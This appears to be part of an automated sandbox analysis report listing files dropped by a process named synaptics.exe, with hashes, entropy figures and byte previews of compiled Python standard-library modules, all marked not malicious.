                                                                                                                                                                                                                Preview:o........{-d.........................@...s^...d.Z.d.Z.d.d.l.m.Z.m.Z...G.d.d...d.e...Z.G.d.d...d.e...Z.e.e.d...Z.d.d...Z.e.d...Z.e.d.d...=.e.d...Z.e.d...Z.e.e.e.e.i.Z.e.e.e.e.i.Z.e.e.e.e.i.Z.e.e.e.e.i.Z.e.e.e.e i.Z!e.e"e.e#i.Z$e%e%e&e&e'e'e(e(e)e*e+e,e-e-e.e.i.Z/e%e0e&e1e'e2e(e3e)e4e+e5e-e6e.e7i.Z8d.Z9d.Z:d.Z;d.Z<d.Z=d.Z>d.Z?d.Z@d.ZAd.ZBd.ZCd.ZDeEd.k...r-d.d...ZFeGd.d....zZHeH.Id.....eH.Id.e.......eFeHe.d ....eFeHe.d!....eFeHe.d!....eH.Id"e9......eH.Id#e:......eH.Id$e;......eH.Id%e<......eH.Id&e=......eH.Id'e>......eH.Id(e?......eH.Id)e@......eH.Id*eA......eH.Id+eB......eH.Id,eC......eH.Id-eD......W.d.........n.1...s"w.......Y...eJd.....d.S.d.S.)/z.Internal support module for srei..3......)...MAXREPEAT..MAXGROUPSc........................s&...e.Z.d.Z.d.Z.d.Z.d...f.d.d...Z.....Z.S.)...errorai...Exception raised for invalid regular expressions... Attributes:.. msg: The unformatted error message. pattern: The regular expression pattern. pos: The index in the pattern
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):21765
                                                                                                                                                                                                                Entropy (8bit):5.594504068971361
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:384:Oi75DWum7nnQBcNr5ZjTL2xs66HeYHmDcgR6OW7tAu9oD3P4At2XmaUI30TAIJzZ:Oi35K2x6+Ym7R6OW7tX+AAt2X0bJp8Ns
                                                                                                                                                                                                                MD5:583BAD1B9A113C61167DD216279D524C
                                                                                                                                                                                                                SHA1:8F66DF388D15486DE0FD98EDDF4ECE911BB9B71F
                                                                                                                                                                                                                SHA-256:6645CDD0F90237430D866C6F9A17CFBA1CAFBA8BB6200515C472744C097DB16A
                                                                                                                                                                                                                SHA-512:1207CEC51819AE4720F266C98FEE6EFC17A2E589E7B0D0B49BEA9C5EF21D769959DFEDFABE8D22DE146FC121215859C64FB60C54BC83AB1BEF66F1FD2AE20AC5
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........{-d.........................@...s....d.Z.d.d.l.T.d.Z.d.Z.e.d...Z.e.d...Z.e.d...Z.e.d...Z.e.d...Z.e.e.e.h...Z.e.e.e.e.e.e.e.h...Z.e.e.d...f.e.e.d...f.e.e.d...f.e.e.d...f.e.e.d...f.e.e.d...f.e.e.d...f.e.e.d...f.d...Z.e.e.f.e.e.f.e.e.f.e.e.e.f.g.f.e.e.e.f.g.f.e.e.e.f.g.f.e.e.e.f.g.f.e.e.e.f.g.f.e.e.e.f.g.f.e.e f.d...Z!e"e#e$e%e&e'e(e)d...Z*e'e#B.e)B.Z+e,e(B.Z-G.d.d...d.e...Z/G.d.d...d...Z0G.d.d...d...Z1G.d.d...d...Z2d.d...Z3d.d ..Z4d!d"..Z5d#d$..Z6d3d&d'..Z7d(d)..Z8d*d+..Z9d4d-d...Z:d/d0..Z;d1d2..Z<d,S.)5z.Internal support module for sre.....)...*z..\[{()*+?^$|z.*+?{Z.0123456789Z.01234567Z.0123456789abcdefABCDEFZ4abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZz. ............................\).z.\a..\bz.\fz.\nz.\rz.\tz.\vz.\\).z.\Ar....z.\Bz.\dz.\Dz.\sz.\Sz.\wz.\Wz.\Z)...i..L..m..s..x..a..t..uc....................@...s....e.Z.d.Z.d.S.)...VerboseN)...__name__..__module__..__qualname__..r....r.....*C:\Users\user\Desktop\tmp\lib\sre_parse.pyr....G...s........r....c..............
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):44830
                                                                                                                                                                                                                Entropy (8bit):5.569832628698238
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:768:I653tgq4iJVJd4LRmQPAMN4FM81OVgTkChwR9FP:I63tBHJDy9T9NCUM1CRbP
                                                                                                                                                                                                                MD5:A44484B0F15466A33B1197A000AD1374
                                                                                                                                                                                                                SHA1:52069A688F00C83F158C24BE43FB2567937604B5
                                                                                                                                                                                                                SHA-256:641CD37B36C42AEF1733AB5C713A679E3206B4702C0706D62DAF5674F7B972A2
                                                                                                                                                                                                                SHA-512:EAEBFB9EA7E02FEE78D8FA04014977F11AC5CC0301981F7A00038886171A4115A2479232485B670BB9C1B5A9DDC3B1EC4D7E75A0A1E9804203BE7FA94588A139
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........{-d.........................@...s....d.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.Z.d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z.m Z m!Z!..z.d.d.l.m"Z"..W.n...e#yi......Y.n.w.d.d.l.m$Z$m%Z%m&Z&m'Z'm(Z(m)Z)m*Z*m+Z+m,Z,m-Z-..d.d.l.m.Z.m/Z/..e.j0d.e1d.d...e.d.....e.j0d.e1d.d...e.d.....e.j0d.e1d.d...e.d.....e.j0d.e1d.d...e.d.....e.j0d.e1d.d...e.d.....e.j0d.e1d.d...e.d.....e2j3..Z4e2_4d.d...e2j5.6..D...Z7e8e2d.d...Z9G.d.d...d.e...Z:G.d d!..d!e...Z;G.d"d#..d#e...Z<G.d$d%..d%e...Z=e.j>d&k...r.d.d'l.m?Z?m@Z@..d.d(lAmAZAmBZBmCZC..d.d)lAmDZDmEZEmFZF..d.d.lAZGd.d.lHZHd.d.lIZId.d.lJZJeKZLd*g.ZMeNe.d+..ZOe.ZPe.ZQd,d-..ZRd.d/..ZSd0d1..ZTd2d3..ZUe.d4d5..ZVd6d7..ZWG.d8d9..d9e.d9d:....ZXG.d;d<..d<eXe...ZYG.d=d>..d>e...ZZeYj[f.d.d.d.d?..d@dA..Z\d[e]dBeYj[d.d.d.d.d.dC..dDdE..Z^e\Z_e^Z`G.dFdG..dG..ZadHdI..ZbG.dJdK..dKeA..ZceceZ_deaeZ_ed.d.dBe]e3d.dLdLd.f.dMdN..ZfdOdP..ZgdQZhdRZidSdT..ZjdUdV..Zkeld.eFf.dWdX..ZmdYdZ..Znd.S.)\
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):4283
                                                                                                                                                                                                                Entropy (8bit):5.539617439246459
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:96:Jn/f+60wN3EXHu/aowjk0wBoCAEFXOrW6QBeABPl:JeRy3EuBwjk0w+CFXefQBT
                                                                                                                                                                                                                MD5:FECC28546ECFA99521EC73116D4C82E6
                                                                                                                                                                                                                SHA1:F57A9E5F62CC98A2B9578A616576F87EFCB64AB7
                                                                                                                                                                                                                SHA-256:7DC03EFD9B3CA6963EC15D77FEE0E1EE38D78E7B667B123BDBC29545BE437A72
                                                                                                                                                                                                                SHA-512:570793A7AB671F1096A4AA63C586F9E9BBBBCEAF031766D003A84FBD5D386969A9D850306E6879EBBD5252A160740B1A0D6FEC0FAB5A5DDD6DB8E81D14EE5575
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........{-d0........................@...sJ...d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.d...Z.d.d...Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d d!..Z.d"d#..Z.d$d%..Z.d&d'..Z.d(d)..Z d*Z!d+Z"e"Z#d,Z$d-Z%d.Z&d/Z'd0Z(d-Z)d.Z*d/Z+d1Z,d2Z-d3Z.d.Z/d.Z0d.Z1d.Z2d.Z3d.Z4d.Z5d.Z6d.Z7d3Z8d2Z9d.Z:d4Z;d5Z<d6Z=d7Z>d8Z?e.d9f.e.d:f.e.d;f.e.d<f.e.d=f.e.d>f.e.d?f.f.e)d@f.f.e*dAf.f.e+e!B.d:f.e!dBf.e+dCf.f.e-d@f.f.e.dAf.f.e/e"B.d:f.e"dBf.e/dCf.f.e1d@f.f.e2dAf.f.e3e$B.dDf.e$dEf.e3dCf.f.f.Z@dFdG..ZAd2ZBd*ZCd/ZDd3ZEd.ZFd.ZGd.ZHd.ZId.ZJd5ZKd.ZLd.ZMd+ZNd,ZOd.ZPd-ZQd4ZRz.d.dHlST.W.dIS...eT..y$......Y.dIS.w.)JzoConstants/functions for interpreting results of os.stat() and os.lstat()...Suggested usage: from stat import *...................................................c....................C........|.d.@.S.).zMReturn the portion of the file's mode that can be set by. os.chmod().. i..........moder....r.....%C:\Users\user\Desktop\tmp\lib\stat.py..S_IMODE...........
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):7112
                                                                                                                                                                                                                Entropy (8bit):5.386566110982794
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:192:jLetNTT8nglJcsGpTeWD3EDNmO2vja68/2s4li6lu:2bTT8nKvGpT/O2vja68/x4limu
                                                                                                                                                                                                                MD5:901532B9A4180D9AFE6EB0A7337DE64F
                                                                                                                                                                                                                SHA1:FF77340F718A103676EFAB19AA9E4F1CA1E9B1F2
                                                                                                                                                                                                                SHA-256:0A47879E757F7688229E067698333D5DF07D2FADF2660CE135F464AEE8CECF85
                                                                                                                                                                                                                SHA-512:4B93C5676807E3361C8B9E61B3C52EC33A4FB7904C07F4E56AC7CE166E28C2FA47ED126DEDEBC1FF4FF651B819B07E9DDCEA9A4C890E31B37B777B0A7CA9A384
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........{-d^*.......................@...s....d.Z.g.d...Z.d.d.l.Z.d.Z.d.Z.d.Z.e.e...Z.d.Z.e.d...d...Z.d.Z.d.Z.e.e...e...e...Z.d.d.d...Z.d.d.l.Z.d.d.l.m.Z...i.Z.G.d.d...d...Z.e.......G.d.d...d...Z.d.S.).an...A collection of string constants...Public module variables:..whitespace -- a string containing all ASCII whitespace.ascii_lowercase -- a string containing all ASCII lowercase letters.ascii_uppercase -- a string containing all ASCII uppercase letters.ascii_letters -- a string containing all ASCII letters.digits -- a string containing all ASCII decimal digits.hexdigits -- a string containing all ASCII hexadecimal digits.octdigits -- a string containing all ASCII octal digits.punctuation -- a string containing all ASCII punctuation characters.printable -- a string containing all ASCII characters considered printable..)...ascii_letters..ascii_lowercase..ascii_uppercase..capwords..digits..hexdigits..octdigits..printable..punctuation..whitespace..Formatter..Template.....Nz. .....Z.abcdefg
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):17085
                                                                                                                                                                                                                Entropy (8bit):5.692305260978468
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:384:vORubSi/2orlLsqOf9dzA3gfqtv+ScNDMepN9WDnuxb3rOyb5:vOkbSi+orD29JlqtvtcNoepN9Wzra
                                                                                                                                                                                                                MD5:0A992A490DE21283B2FDC8755DA9A746
                                                                                                                                                                                                                SHA1:1503F20A722518993351DBBF2F51F1E08860E94C
                                                                                                                                                                                                                SHA-256:520AC4344735AF54A7CDAFCBB9FF39C72B0E638840C3770F894188BA1F3EE1CB
                                                                                                                                                                                                                SHA-512:381C584AC28B70C5B31573EE26CCE9BF4BD722A341D0D73566C7D57832DD56BEAD3B0E3BA3A5425EFAED846491B9A3ABD1997D1ED12636172AC83471FCD559ED
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........{-d.3.......................@...s....d.Z.d.d.l.m.Z...e.j.d.k.s.J...d.d...Z.e.g.d...e.e.d.d.........Z.d.d...Z.i.d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d ..d!d"..d#d$..d%d&..d'd(..d)d*..d+d,..i.d-d...d/d0..d1d2..d3d ..d4d5..d6d7..d8d9..d:d;..d<d=..d>d?..d@dA..dBdC..dDdE..dFdG..dHdI..dJdK..dLdM....i.dNdO..dPdQ..dRdS..dTdU..dVdW..dXdY..dZd[..d\dM..d]dO..d^dQ..d_dS..d`dU..dadW..dbdY..dcd[..ddde..dfdg....i.dhdi..djdk..dldm..dndo..dpdq..drds..dtde..dudg..dvdi..dwdk..dxdm..dydo..dzdq..d{ds..d|d}..d~d...d.d.....i.d.d...d.d...d.d...d.d...d.d...d.d}..d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d.....i.d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d.....i.d.d...d.d...d.d...d.d...d.d..d.d..d.d...d.d..d.d..d.d..d.d..d.d..d.d..d.d..d.d..d.d..d.d....i.d.d..d.d..d.d..d.d..d.d...d.d..d.d..d.d..d.d..d.d..d.d..d.d..d.d..d.d..d.d..d.d..d.d.....i.d.d...d.d...d.d...d.d...d.d...d.d.
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):317
                                                                                                                                                                                                                Entropy (8bit):5.004309073595233
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:6:y/0kFextfvXhzYXcCuYKvg6FraMaVkoopngmIVZAuGuFMW/Zkn:Cqxt35YXcaKvjFrDaVkoek+0R/Zkn
                                                                                                                                                                                                                MD5:77A0D9ED36A87E36D88CCBA5978CA258
                                                                                                                                                                                                                SHA1:8F4FA582EEA688A7A2B2F9C00B5613CA37A15B9E
                                                                                                                                                                                                                SHA-256:11916769D9FC8B8196442B959BEF4F15E50CB50C7C4E586EC19A52FB1510BFE0
                                                                                                                                                                                                                SHA-512:59EFDCC5C7F39822738A6F456D4F883B7011AC51CF22C9A77E845A5EB8481E21D2196A95276B5432DD1F60B7214EA5B7F5FC45C1F17E9E5E9017E24483CAF218
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........{-d.........................@...s,...g.d...Z.d.d.l.T.d.d.l.m.Z...d.d.l.m.Z...d.S.).).Z.calcsize..packZ.pack_into..unpackZ.unpack_fromZ.iter_unpack..Struct..error.....)...*)..._clearcache)...__doc__N)...__all__Z._structr....r......r....r.....'C:\Users\user\Desktop\tmp\lib\struct.py..<module>....s............
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):24074
                                                                                                                                                                                                                Entropy (8bit):5.281865163751495
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:384:YGeOIQ/N1bmiY+HWkXkONXPVlMyNwfUC9Nrz/Stjtb7hLBx3/Tds5Vp:HeT81bminY0XPVmyNwM8NPqJ7Zb7ds5T
                                                                                                                                                                                                                MD5:526AAADA9AB8E695360707CDF542A57F
                                                                                                                                                                                                                SHA1:8CB8823FD9020DE44303F4BF198C4D8364B383EC
                                                                                                                                                                                                                SHA-256:C60C0CF6FDE90C10688308B1F42444405D1E162E193239DF7AE236A29B5B7C0D
                                                                                                                                                                                                                SHA-512:B5AE5B96F8BE3D368C8BBA198E392CB04A9959FB1E56B6514FB803F06D9BE5364B18156C8FFBBB4E367AAFF90CA1398804658F3DB24FF921A1FFB558AC484B76
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........{-dku.......................@...s....d.Z.g.d...Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.e.j.Z.e.j.e.j.B.e.j.B.Z.e.e.d...rJe.e.j.O.Z.e.Z e.e.d...rVe e.j!O.Z e.e.d...r_e.j"Z"n.d.Z"d.Z#e...Z$d.d...Z%d.d...Z&d.d...Z'G.d.d...d...Z(d.d...Z)d.d...Z*d.a+d.d...Z,d.d...Z-d.d...Z.d.d...Z/d.a0d.d...Z1d d!..Z2d"d#..Z3d?d%d&..Z4d@d'd(..Z5d)e#d.f.d*d+..Z6G.d,d-..d-..Z7G.d.d/..d/..Z8.....2dAd.d3..d4d5..Z9e.j:d6k.s.e.j;d7k.r.e9Z<n.e.e.d8..a=......dBd.d3..d9d:..Z<G.d;d<..d<..Z>G.d=d>..d>..Z?d.S.)Ca....Temporary files...This module provides generic, low- and high-level interfaces for.creating temporary files and directories. All of the interfaces.provided by this module can be used without fear of race conditions.except for 'mktemp'. 'mktemp' is subject to race conditions and.should not be used; it is provided for backward compatibility only...The default path names are returned as str. If you supply bytes as.input, all return values will b
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):13822
                                                                                                                                                                                                                Entropy (8bit):5.3382593142335235
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:384:GB47d3TOzzlFEYKRuPSzqjNGmwImkWf8FBQ:GB47deF/5JNG5MkkBQ
                                                                                                                                                                                                                MD5:C761D7E3B34ECCACCF7A7F6D9337EA6C
                                                                                                                                                                                                                SHA1:B36C96BFC9252C9754DD8D9756AC0E8B28AB0F4F
                                                                                                                                                                                                                SHA-256:866C4E983F366182F067A09E8FA98744666BEB69FC6BAE591B193E3EF9C71D7C
                                                                                                                                                                                                                SHA-512:3B6171E92C138C9E9A25D86B1A3ABDB341DC43FAA7085664123738E715EA1EF73D3F51D4A0E72EA8A63BB77533174CBD667095E2046D1D48B4F5BA6D0855F491
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........{-d*O.......................@...s....d.Z.d.d.l.Z.g.d...Z.d.Z.G.d.d...d...Z.d.d.d...Z.d.d.d...Z.d.d...Z.e...d.e.j...Z.e...d.e.j...Z.d.d...Z.d.d.d...Z.e.d.k.rDe.e.d.......d.S.d.S.).z.Text wrapping and filling.......N)...TextWrapper..wrap..fill..dedent..indent..shortenz...... c....................@...s....e.Z.d.Z.d.Z.i.Z.e.d...Z.e.D.].Z.e.e.e.e...<.q.d.Z.d.Z.d.e...e.....Z.d.e.d.d.......Z.e...d.e.e.e.e.d.....e.j...Z.[.[.[.e...d.e.....Z.[.e...d...Z.....................d&d.d.d...d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d d!..Z.d"d#..Z.d$d%..Z.d.S.)'r....a..... Object for wrapping/filling text. The public interface consists of. the wrap() and fill() methods; the other methods are just there for. subclasses to override in order to tweak the default behaviour.. If you want to completely replace the main wrapping algorithm,. you'll probably have to override _wrap_chunks()... Several instance attributes control various aspects of wrapping:. width (default:
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):44979
                                                                                                                                                                                                                Entropy (8bit):5.172062783983674
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:768:R1N/MIxOwAgbSGxwbNNo+rkPsXj16a1Zmi8Y2S41QrTrWOnO89x+6Lc/QpZ2efn0:Rj/8Zf2lbPs/v612aOJ/46PeaBATiI/z
                                                                                                                                                                                                                MD5:62CD3C50DF22083AF7EF5AC7AF699E5F
                                                                                                                                                                                                                SHA1:FF347DB26731A25A050A9A7A7FC7226805EEB92D
                                                                                                                                                                                                                SHA-256:3CE601F4C854F9E79BF5EEB444000C29777ED5B8207907627BD950B38ACDB9FC
                                                                                                                                                                                                                SHA-512:3F04278482D56DCA9FECB798087BB1DEB0338CAE89B4AA91E35A81089B20225B3320239F1FEDC8BA98F4191D3AE080D01611C908537D2A12DECACEC56F7B5172
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........{-d.........................@...s6...d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...z.d.d.l.m.Z...W.n...e.y=......d.d.l.m.Z...Y.n.w.g.d...Z.e.j.Z.e.j.Z.e.j.Z.e.j.Z.z.e.j.Z.d.Z.e...d.....W.n...e ye......d.Z.Y.n.w.e.j!Z"z.e.j#Z$W.n...e yy......d.Z$Y.n.w.e.j%Z%[.d.a&d.a'd.d...Z(d.d...Z)d.d...Z*d.d...Z+e.Z,d.d...Z#G.d.d...d...Z-e-Z.G.d.d...d...Z/G.d.d...d...Z0G.d.d...d.e0..Z1G.d.d...d...Z2G.d.d ..d ..Z3G.d!d"..d"e4..Z5e.d#..j6Z7d$d%..Z8e#..a9i.Z:i.Z;e...Z<e...a=e>..a?d&d'..Z@G.d(d)..d)..ZAz.d.d*l.mBaCmDZE..W.n#..e...y.......d.d+lFmGZH..d.d,l.mIZI..eId-d...ZDd/d-..ZEd0d1..aCY.n.w.tCZJd2d3..ZKG.d4d5..d5eA..ZLG.d6d7..d7eA..ZMG.d8d9..d9eA..ZNd:d;..ZOd<d=..ZPd>d?..ZQd@dA..ZRdBdC..ZSdDdE..ZTg.ZUd.aVdFdG..ZWd.dHl.mXZX..eM..aYdIdJ..ZZdKdL..Z[z.d.dMl.m\Z]..W.n...e...y.......d.dNl^m]Z]..Y.n.w.dOdP..Z_e`e.dQ....r.e.jae_dR....d.S.d.S.)Sz;Thread module emulating a subset of Java's threading model......N)...monotonic)...WeakSet)...islice..count)...deque)...get_ident
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):2748
                                                                                                                                                                                                                Entropy (8bit):5.77254890558528
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:48:+HWS58lFEOqIlPBJR41WBzH3ch9C7Q7WnvKQvVgkGQLU:+HWSOFEOb5n1Bb3ch9T6qKLU
                                                                                                                                                                                                                MD5:B8D9D78B5D9347F1BBECC57038C5BED7
                                                                                                                                                                                                                SHA1:6C968AAF8D97DFDA5E7EC77C0147A605900B9AD2
                                                                                                                                                                                                                SHA-256:8FA512615E3B9C43C8CE54A7AE2B38C73FF862E30D7258B3C0B10E3C4299715E
                                                                                                                                                                                                                SHA-512:BBC7CA9122A85ABC6627690BD64565E1185FCF2DB4648EA18F99C67FB74B0D2A948E49191EAA8A168B6AE03E5A36244CC66CFA9D0979CAC35C12178FB9625E47
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........{-d.........................@...sF...d.Z.g.d...Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d Z d!Z!d"Z"d#Z#d$Z$d%Z%d&Z&d'Z'd(Z(d)Z)d*Z*d+Z+d,Z,d-Z-d.Z.d/Z/d0Z0d1Z1d2Z2d3Z3d4Z4d5Z5d6Z6d7Z7d8Z8d9Z9d:Z:d;Z;d<Z<d=Z=d>Z>d?Z?d@Z@dAZAdBZBdCZCdDdE..eD...E..D...ZFe..GeF.H......i.dFe...dGe...dHe*..dIe...dJe+..dKe...dLe...dMe...dNe%..dOe0..dPe(..dQe...dRe&..dSe...dTe...dUe'..dVe5..i.dWe...dXe6..dYe...dZe1..d[e2..d\e)..d]e...d^e7..d_e...d`e...dae#..dbe...dce...dde...dee...dfe...dge ....e$e/e3e4e.e.e"e-e.e.e,e.e!dh....ZIdidj..ZJdkdl..ZKdmdn..ZLdoS.)pz.Token constants.)...tok_name..ISTERMINAL..ISNONTERMINAL..ISEOF................................................................................................................................................................. ....!...."....#....$....%....&....'....(....)....*....+....,....-........./....0....1....2....3....4....5....6....7....8....9....:....;....<....
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):17204
                                                                                                                                                                                                                Entropy (8bit):5.77666597107552
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:384:1SAswuiDIbAPaiOkoc/w3CJg+YRn9JMHfHE7BFli:1mimAPajkoc/wyJg+Y/s87BFli
                                                                                                                                                                                                                MD5:11FC14009A3001DEE0F0A604A9126AB8
                                                                                                                                                                                                                SHA1:4DDB56824E2A25789E6CAABB9922DF3C36855325
                                                                                                                                                                                                                SHA-256:81C2A7EED73A21F6E6A6ED58FDB7820797628CBBC742BE109C15C4A18FC8EE30
                                                                                                                                                                                                                SHA-512:99B8185A58224ABE2AF8CBFBA453D4354E527A5729CF938EB063971DDE915CC69A011DE3212208203CA9349B77B02A47970136FA3141CC1DCD8CB7F57E6FA732
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........{-d.g.......................@...sT...d.Z.d.Z.d.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.T.d.d.l.m.Z...e...d.e.j...Z.e...d.e.j...Z.d.d.l.Z.e.j.g.d.....Z.[.G.d.d...d.e...d.d.....Z.d.d...Z.d.d...Z.d.d...Z.d.Z.d.Z.e.e.d.e.......e.e.....Z.d.Z d.Z!d.Z"d.Z#d.Z$e.e!e"e#e$..Z%d.Z&e.d.d ..e.e&....Z'd!e&..Z(e.e'e(..Z)e.d"e)d#....Z*e.e*e)e%..Z+d$d%..Z,e.j-d&d'....Z.e.e,....Z/d(Z0d)Z1d*Z2d+Z3e.e/d,..e/d-....Z4e.e/d...e/d/....Z5e.e6e.j7e8e.d0d1......Z9e.d2e9..Z:e.e+e:e5e ..Z;e.e;..Z<e.e/d3..e.d4d.....e/d5..e.d6d.......Z=e.d7e.e4..Z>e.e.e>e+e:e=e ....Z?i.Z@e,..D.].ZAe0e@eAd4..<.e1e@eAd6..<.e2e@eAd,..<.e3e@eAd-..<...q.eB..ZCeB..ZDe,..D.]%ZEeEd6..eEd4..f.D.].ZFeC.GeF......qIeEd-..eEd,..f.D.].ZFeD.GeF......qZ..q?d8ZHG.d9d:..d:eI..ZJG.d;d<..d<eI..ZKG.d=d>..d>..ZLd?d@..ZMdAdB..ZNdCdD..ZOdEdF..Z.dGdH..ZPdIdJ..ZQdKdL..ZRdMdN..ZSeTdOk...r.eS....d.S.d.S.)Pao...Tokenization help for Python programs...tokenize(readline) is a generator that breaks a stream
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):21718
                                                                                                                                                                                                                Entropy (8bit):5.294671461425223
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:384:MooNGsSgHvgJJpLbiO+pSbnwRG+SbL3JWFsFmpbQigBsGUa2l4cCKJJBq:MookcHvIJpiJAngz4BNUpl4cCkJBq
                                                                                                                                                                                                                MD5:0FA240C93F923E4519847B466CB9E923
                                                                                                                                                                                                                SHA1:CB70E1ECB07ECD6D5BA85E0782AD76F60820A27C
                                                                                                                                                                                                                SHA-256:75234828F03823786CE546C52692EABAC7AB604C575CFA256AA89C9079228B1F
                                                                                                                                                                                                                SHA-512:E4B2C3BDDA7D06012F2DB9D5EADB8EA83A6CED6DA9D8D2A2BC79D8F438A01C6DC599B607002E68A15B9CE370D638097E65C393AD5CE8997DB91871374018C427
                                                                                                                                                                                                                Malicious:false
